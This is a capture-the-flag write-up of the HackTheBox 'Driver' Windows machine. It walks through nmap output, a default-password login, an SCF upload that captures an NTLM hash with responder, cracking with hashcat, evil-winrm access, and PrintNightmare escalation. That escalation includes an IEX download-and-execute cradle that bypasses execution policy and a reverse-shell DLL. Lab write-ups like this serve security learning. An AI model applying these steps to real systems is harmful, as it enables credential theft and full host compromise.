nmap -sC -sS -sV -F >scan.txt
Starting Nmap 7.92 ( https://nmap.org ) at 2021-10-16 13:34 EEST
Nmap scan report for (
Host is up (0.084s latency).
Not shown: 97 filtered tcp ports (no-response)
80/tcp  open  http         Microsoft IIS httpd 10.0
| http-methods:
|_  Potentially risky methods: TRACE
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
|_http-server-header: Microsoft-IIS/10.0
| http-auth:
| HTTP/1.1 401 Unauthorized\x0D
|_  Basic realm=MFP Firmware Update Center. Please enter password for admin
135/tcp open  msrpc        Microsoft Windows RPC
445/tcp open  microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
Service Info: Host: DRIVER; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 6h59m59s, deviation: 0s, median: 6h59m59s
| smb2-time:
|   date: 2021-10-16T17:34:49
|_  start_date: 2021-10-16T15:11:52
| smb2-security-mode:
|   3.1.1:
|_    Message signing enabled but not required
| smb-security-mode:
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 51.57 seconds

If we try to enter to the webpage, it requests a login. I just tried admin - admin and it worked…

After adding driver.htb to /etc/hosts, we can see Firmware Updates as the only working tab.

Getting the foothold

… firmware update to our file share. Our testing team will review the uploads manually and initiates the testing soon.

According to the text in the page, the file is beign uploaded to the SMB share, which the team will review the uploads.

A Shell Command File (.scf) gets executed if the user browses the file. We can include a remote path for the icon and the browse will try to authenticate with its credentials to the given path.

If we upload the SCF @zebra.scf (we can use @ so the file stays at the top of the share) with the given content:

By using responder, we can grab the user hash:

responder -wrf --lm -v -I tun0

We get the following:

To crack the NTLMv2 Hash, we can dump it to a file (hash.txt) and crack it using hashcat:

hashcat -m 5600 hash.txt /usr/share/dict/rockyou.txt -o cracked.txt

After getting the password, we might be able to login. The shared folders in Samba doesn’t seem to be accessible. I couldn’t find anything for a while, so I decided to do a deeper port scan.

There is a port open :5985, which appears at nmap as an HTTP service but googling it shows it is actually a remote management service for Windows (like a SSH). By using evil-winrm we can connect to the user using the cracked password.

evil-winrm -i -u tony -p *****

Aaand we got the user flag!

Privilege escalation

We don’t have connection to the Internet to download privilege escalation scripts. But we can open a local HTTP server in a folder with the tools:

python -m http.server -d ../Tools 8080

In the reverse shell, we can download them with Invoke-WebRequest.

Invoke-WebRequest -OutFile winpeas.bat

After scanning and not finding anything, I googled the vulnerabilities available for the current version. The most recent one is about Printer Spooler (PrintNightmare), which let’s you escale privileges easily.

To use the CVE exploit, I followed this blog post. As a summary, you have to start the SMB service in your host, share a .dll which contains a reverse shell, call the python exploit and wait for the shell to connect.

After those steps, we have authority.

nt authority\system

Then, we can get the root flag as usual by going to the Administrator’s desktop.

C:\Users\Administrator\Desktop>type root.txt

To know more

First of all, I was lucky to hit the right with the Printer Spooler, but the correct way to check it was to

rpcdump.py @ | grep MS-RPRN

We can only run the printnightmare exploit when the Print System Remote Protocol exists.

That script gave us access to the Administrator account. Although, it seems like he has not many administrator rights (in order to own the whole machine). Another way to perform the printnightmare exploit is by running the script locally from tony’s PS session.

By using upload command we can upload our local copy of the exploit so user tony can execute it. But the Execution Policy is restricted, so we are not able to run the script as usual. We have to bypass the Execution Policy (there are a lot of ways, but I chose a simple one) by using the IEX command.

python -m http.server 8001
IEX(New-Object Net.Webclient).downloadstring('')

The IEX command automatically imports the module, so we can simply run:

Invoke-Nightmare -NewUser "zebra" -NewPassword "zebra1234"

And connect to the new user with evil-winrm, this one will have all the administrator rights.